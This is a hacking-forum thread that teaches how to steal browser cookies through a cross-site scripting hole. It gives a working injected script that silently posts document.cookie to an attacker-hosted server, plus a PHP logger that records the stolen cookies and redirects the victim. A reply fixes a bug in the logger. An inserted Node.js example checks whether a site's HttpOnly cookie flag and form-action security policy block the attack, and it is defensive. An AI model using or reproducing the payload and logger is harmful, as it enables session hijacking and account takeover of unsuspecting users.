Exploit XSS vulnerabilities

Hatemind
n00b
Posts: 5
Joined: Fri May 30, 2014 1:14 pm

Exploit XSS vulnerabilities

Post by Hatemind » Fri Jun 06, 2014 10:03 pm

This may be well known, but I'm going to show you how to actually steal cookies once you have found an XSS. It submits a hidden form to a PHP file you host. It could redirect to a URL with GET, but then it's more obvious that cookies were stolen by the URL if the victim checks browsing history. You could also use the JavaScript form submission, but I used a fake click instead.

XSS CODE:

<script>document.write('<form method=post action="http://example.com/logger.php" style="display:none;"><textarea name=data>', document.cookie, '</textarea><input type=submit id="submit"/></form>');document.getElementById('submit').click();</script>

PHP CODE:

<?PHP
if (isset($_REQUEST['data'])) {
    $data = $_REQUEST['data'];
    $url = "http://www.google.com/"; //URL to redirect to after stealing shit.
    $log = fopen("xsslog.html", "a+");
    fwrite($log, $data."<br>\r\n<br>\r\n");
    fclose($log);
    header("Location: ".$url);
}
?>

HTML CODE: (optional but sexy)

<style>* {background: #080808; color: #009900; font-family: "Courier New", Courier, "Lucida Sans Typewriter", "Lucida Typewriter", monospace;}</style>
<h1>XSS C00KIE L0GS</h1>

You can't be a hacker without green text on a black screen and numbers in place of letters.

In order to use stolen cookies, you'll need to find a browser extension that lets you do so.
Last edited by Hatemind on Sat Jun 14, 2014 3:43 am, edited 1 time in total.
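
Added example, not part of the original post: a small Node.js check of a response's headers for the two settings that break the technique above, HttpOnly on the session cookie (hides it from document.cookie) and a CSP form-action directive (blocks the cross-origin form post). The function names and header values are constructed for illustration.

```javascript
// Added example; header values below are constructed sample data.

// Parse one Set-Cookie value into { name, attrs }, attribute names lowercased.
function parseSetCookie(value) {
  const parts = value.split(';').map(p => p.trim()).filter(Boolean);
  const first = parts[0] || '';
  const eq = first.indexOf('=');
  const name = eq === -1 ? first : first.slice(0, eq);
  const attrs = {};
  for (const p of parts.slice(1)) {
    const i = p.indexOf('=');
    const key = (i === -1 ? p : p.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : p.slice(i + 1).trim();
  }
  return { name, attrs };
}

// Return the source list of a CSP directive, or null when absent.
function cspDirective(csp, directive) {
  for (const d of (csp || '').split(';')) {
    const tokens = d.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === directive) return tokens.slice(1);
  }
  return null;
}

// List what leaves the response open to the cookie-posting script above.
function auditResponse(setCookies, csp) {
  const findings = [];
  for (const raw of setCookies) {
    const { name, attrs } = parseSetCookie(raw);
    if (!attrs.httponly) findings.push(`${name}: no HttpOnly, readable via document.cookie`);
  }
  // form-action does not fall back to default-src; it must be set explicitly.
  const formAction = cspDirective(csp, 'form-action');
  if (formAction === null) findings.push('CSP: no form-action, forms may post to any origin');
  else if (formAction.includes('*')) findings.push('CSP: form-action allows any origin');
  return findings;
}

const weak = auditResponse(['PHPSESSID=abc123; path=/'], '');
const hardened = auditResponse(
  ['PHPSESSID=abc123; Path=/; HttpOnly; SameSite=Lax'],
  "default-src 'self'; form-action 'self'");
console.log({ weak, hardened });
```

HttpOnly only hides the cookie from script; the injected script still runs in the victim's session, so output encoding at the injection point remains the actual fix.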

Cool_Fire
Not a sandwich
Posts: 1912
Joined: Fri May 09, 2003 1:20 pm
Location: 41 6d 73 74 65 72 64 61 6d

Re: Exploit XSS vulnerabilities

Post by Cool_Fire » Mon Jun 09, 2014 2:12 pm

Minor bug in your php:
You're writing $data but you never copy $_REQUEST['data'] into $data.
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.

Hatemind
n00b
Posts: 5
Joined: Fri May 30, 2014 1:14 pm

Re: Exploit XSS vulnerabilities

Post by Hatemind » Sat Jun 14, 2014 3:43 am

Cool_Fire wrote: Minor bug in your php:
You're writing $data but you never copy $_REQUEST['data'] into $data.

No idea how I missed that, but I fixed it.
